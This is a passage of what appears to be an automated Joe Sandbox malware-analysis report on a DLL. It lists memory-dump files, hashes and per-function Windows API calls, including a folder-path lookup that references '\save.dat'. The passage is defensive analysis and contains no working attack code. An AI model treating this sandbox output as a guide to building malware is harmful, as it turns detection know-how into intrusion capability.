Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: c23c21f39a4b820c8a1a385926a2e312740998666ecc509bfd1a34a1a430ec9a
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 5B0172B200114AFBCF029F84DC418DE3F36FB09258B668519FE2859530D336D572AB81

Function 6CEB27DD Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 6CEB27E2
InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 6CEB27F8
PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?,?,?,?,?,6CEB3F7F,?,?,?,?,?,Xll,00000000), ref: 6CEB280B
InterlockedExchange.KERNEL32(?,00000001), ref: 6CEB2834

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: ExchangeInterlocked$CompareCompletionH_prologPostQueuedStatus
String ID:
API String ID: 2927615140-0
Opcode ID: 19338eb7addecd12f1d9a0dbb41c622998f862f589771f642ffd2cca2ae0a531
Instruction ID: 1a7b5788a11df1b8098b2776a1e0e23b6feb2aec1287c22feb7b95f7530e3099
Opcode Fuzzy Hash: 19338eb7addecd12f1d9a0dbb41c622998f862f589771f642ffd2cca2ae0a531
Instruction Fuzzy Hash: 03019E31900604ABD724DB50CE4AFEAB378FF15715F20062DF101A2AD0DBB0BA48CB60

Function 6CEB22AB Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 6CEB22B0
InterlockedIncrement.KERNEL32(?), ref: 6CEB22BF
PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,?,?,?,?,?,6CEC6857,00000000,00000000), ref: 6CEB22D7
InterlockedExchange.KERNEL32(?,00000001), ref: 6CEB2300

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: Interlocked$CompletionExchangeH_prologIncrementPostQueuedStatus
String ID:
API String ID: 2960987973-0
Opcode ID: c5e52207197d19df65b867db471a30e8f227160ba45510579f4b3e3d584e7fe1
Instruction ID: cc02d636f397954af1976fe72a0d559d44c9a17d9548f1a34c0928ce55b2219a
Opcode Fuzzy Hash: c5e52207197d19df65b867db471a30e8f227160ba45510579f4b3e3d584e7fe1
Instruction Fuzzy Hash: 6B017171500605ABD764DF90C949FEAB3B8FF55715F10062DF142A2A80DB70BA49DBA0

Function 6CEB2463 Relevance: 6.0, APIs: 4, Instructions: 35COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 6CEB2463
DeleteCriticalSection.KERNEL32(?), ref: 6CEB2482
CloseHandle.KERNEL32(00000000), ref: 6CEB2491
CloseHandle.KERNEL32(00000000), ref: 6CEB24AC

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: CloseHandle$CriticalDeleteH_prologSection
String ID:
API String ID: 2456309408-0
Opcode ID: 05644144f74cf3b38c8ce7b4cd7d0e522ccdf4ce1c963bf6a72a1c1e401a17c5
Instruction ID: 56b35845559b6694af4d630ec50e507832c2e974137e3915e7b7ec8bbebc00b7
Opcode Fuzzy Hash: 05644144f74cf3b38c8ce7b4cd7d0e522ccdf4ce1c963bf6a72a1c1e401a17c5
Instruction Fuzzy Hash: CE01A271501745DFC7608F64D9087A9BBB4EF18708F20891EE446A2F50CB746648CB61

Function 6CEB235D Relevance: 6.0, APIs: 4, Instructions: 32synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,?,?,6CEC1506), ref: 6CEB236C
InterlockedExchange.KERNEL32(-00000030,00000001), ref: 6CEB237E
PostQueuedCompletionStatus.KERNEL32(?,00000000,00000001,00000000,?,00000000,?,?,6CEC1506), ref: 6CEB238D
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 6CEB239A

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: ExchangeInterlocked$CompletionObjectPostQueuedSingleStatusWait
String ID:
API String ID: 733047984-0
Opcode ID: 58bca273866d8fd13fa52bf8b81941422e8918e61d33d98af6d7473ab88cf670
Instruction ID: 72d7716786f27012a0fa2bea9fe8bdc796aaef94e507171aaf193e72b80f1055
Opcode Fuzzy Hash: 58bca273866d8fd13fa52bf8b81941422e8918e61d33d98af6d7473ab88cf670
Instruction Fuzzy Hash: 21F030B1708111AFDB548FA4DC88F5677BDFF0E3A97200925F891D7290DAB0D8809B20

Function 6CEB5D9A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6CEB5DAA

Part of subcall function 6CECB71C: __FF_MSGBANNER.LIBCMT ref: 6CECB733
Part of subcall function 6CECB71C: __NMSG_WRITE.LIBCMT ref: 6CECB73A
Part of subcall function 6CECB71C: RtlAllocateHeap.NTDLL(01030000,00000000,00000001,00000000,00000000,00000000,?,6CED121A,?,?,?,00000000,?,6CED1107,00000018,6CEEAEA8), ref: 6CECB75F

SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000,00000000,?,?,?,?,?,6CEB871B), ref: 6CEB5DBC

Strings

\save.dat, xrefs: 6CEB5DD0

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: AllocateFolderHeapPathSpecial_malloc
String ID: \save.dat
API String ID: 4128168839-3580179773
Opcode ID: 509281cdf216f1de8d6006133c6bddd26c7197ed6a5d8ad66742e72740b1ac73
Instruction ID: ed09e09cc942b67656520d1fb5a979b79fa5cc623d73f42d3cd5d390b9b24f04
Opcode Fuzzy Hash: 509281cdf216f1de8d6006133c6bddd26c7197ed6a5d8ad66742e72740b1ac73
Instruction Fuzzy Hash: 7E117D33A062443BDB12CE65C9819AFBF7ADF86658B3402ACF8447B701DA731D06C2E0

Function 6CECA0A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMONLIBRARYCODE

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 6CECA0EF

Part of subcall function 6CECAC43: std::exception::_Copy_str.LIBCMT ref: 6CECAC5C

Part of subcall function 6CEC94B0: __CxxThrowException@8.LIBCMT ref: 6CEC950E

std::exception::exception.LIBCMT ref: 6CECA14E

Strings

$, xrefs: 6CECA153

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
